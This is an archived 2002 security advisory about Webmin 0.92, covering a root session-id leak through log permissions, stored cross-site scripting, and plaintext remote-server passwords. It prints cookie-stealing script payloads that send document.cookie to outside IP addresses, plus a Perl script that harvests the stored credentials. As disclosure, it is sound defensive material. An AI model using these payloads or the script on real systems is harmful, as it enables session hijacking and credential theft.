21th Mar 2002 [SBWID-5197]
COMMAND
Local webmin root access
SYSTEMS AFFECTED
version 0.92 affected.
Corrected in 0.93.
PROBLEM
advisory@prophecy.net.nz found two bugs regarding webmin, a web
management tool :
Problem #1:
-----------
Version 0.92-1 of Webmin (when installed by rpm) leaves insecure
permissions on the /var/webmin directory. This means that if command
logging within webmin is enabled, any local user can read the
/var/webmin/webmin.log file and retrieve the root users sid (cookie
session id). It is trivial to then create a faked local cookie using
this session-id, and log directly into webmin as root.
Problem #2:
-----------
If a semi-trusted colleague is given a restricted level of access to
some Webmin functions, specifically sendmail, then malicious code can
be inserted into certain files that would result in revealing roots
webmin sid (cookie session id) when the root user visits the related
page in webmin.
Example Exploit:
----------------
Insert the following line into the virtusers file, and wait for the
root user to visit that page:
</tt></a></td><tt><td><script>/* */document.write(\'<img
src=\"http://192.168.40.1/\'+document.cookie+\'\">\');</script>
Or the following into the /etc/aliases file:
</a></td><td><tt><script>zz=unescape(\"%20\");document.write(\'<img\'/*:
*/+zz+\'src=\"http://10.1.1.33/\'+document.cookie+\'\">\');</script>
Potentially more likely to be exploited however, would be a malicious
local user who has _no_ access to webmin, who could change a file that
webmin views through the HTML interface (where the code being read in
is not checked for HTML). An example would be changing their \'real
name\' in /etc/passwd to be something along the lines of:
<script>zz=unescape(\"%3A\");document.write(\'<img
src=\"http\'+zz+\'//10.1.1.33/\'+document.cookie+\'\">\');</script>
(Although chfn doesn\'t let you specify a username this long, but you
get the idea.)
This same problem exists in pretty much most parts of webmin, where
files (or command output like \'ps\') is read in and displayed in the
web interface.
Update (25 March 2002)
======
Ed [ekg@tricity.wsu.edu] adds :
as a small addendum to this advisory, we noticed some similar file
permission problems in /etc/webmin/servers/, in our local webmin
installation. we were using webmin-0.92-1, noarch RPM version. this
problem was reported to Jamie last month and is fixed in webmin 0.93.
this problem could allow a local user to read the webmin user passwords
for remote hosts running webmin, configured under the \'webmin\' >>
\'webmin servers\' >> \'edit server\' page. this is a problem only if
we enter the login information for a server, so as to enable
auto-login, and thus, could lead to \'root\' or \'admin\' access (on
the remote webmin server) if we are using the cluster users, groups, or
packages feature of webmin.
the username and password are stored, in plaintext, with the rest of
the host information in /etc/webmin/servers/${time}.serv, where ${time}
is the time that the remote server was first discovered by the local
webmin, measured as a number of seconds since the epoch.
/etc/webmin/servers has the search bit enabled, but not the read bit.
therefore we can read the server information files by searching
backwards from the current time, e.g.:
#!/usr/bin/perl
#read server info files by stepping backwards from current time
print STDERR \"looking for server info from /etc/webmin/servers, press ^c to end\\n\";
for ($tstamp= time(); $tstamp > 0; $tstamp--) {
open (SERVINFO, \"</etc/webmin/servers/$tstamp.serv\") or next;
print \"contents of /etc/webmin/servers/$tstamp.serv:\\n\";
print <SERVINFO>;
close SERVINFO or die \"error detected on file close\";
}
SOLUTION
Upgrade to the latest version of Webmin (0.93), which fixes these
issues (as well as a couple of others apparently).
Available from:
http://www.webmin.com/download.html
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
